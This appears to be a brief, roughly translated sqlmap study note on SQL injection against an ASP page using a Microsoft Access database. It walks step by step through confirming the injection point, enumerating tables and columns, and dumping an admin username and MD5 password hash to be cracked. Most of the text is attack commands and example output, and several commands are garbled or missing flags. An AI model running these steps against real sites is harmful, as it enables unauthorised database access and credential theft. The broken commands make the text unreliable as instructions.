Using the Sqlmap tool for acces injection:
1. Determine if a URL has an injection point and determine the database type based on the returned data:
" http://abcd****efg.asp?id=7 "
Let's say the return content is as follows:
-- ----------------------- [INFO] resuming back-end'Microsoft Access' -------------------------
2. Guess the database table, enter:
" http://abcd****efg.asp?id=7 " --tables
3. Input thread: 10, enter after the start stopwatch, find the appropriate table, press CTRL + C to terminate stopwatch.
Suppose you find these tables: admin Mark Province vote
-- ----------------------------------------- [ 4 tables] + -- --------------------+ admin Mark province vote+----------------------+
4. Guess the fields of the admin table:
" http://abcd****efg.asp?id=7 " --tables--columns-t Admin
Suppose you find the following fields for the admin table: ID Username Password
-- ------------------------------- [ " Retrieved:id [ " Retrieved:username [ " Retrieved:password -- --------------------------------
5. Guess the contents of the field:
" http://abcd****efg.asp?id=7 " " Username,password "
The obtained results are assumed to be:
+ -- -------------------------------+ Username | Admin+---------------------------------+ password | 21232F297A57A5A743894A0E4A801FC3 (32-bit MD5 encryption) + -- -------------------------------+
Account: admin Password: Decrypt the cipher.
Access injection of 1.SQLMAP learning notes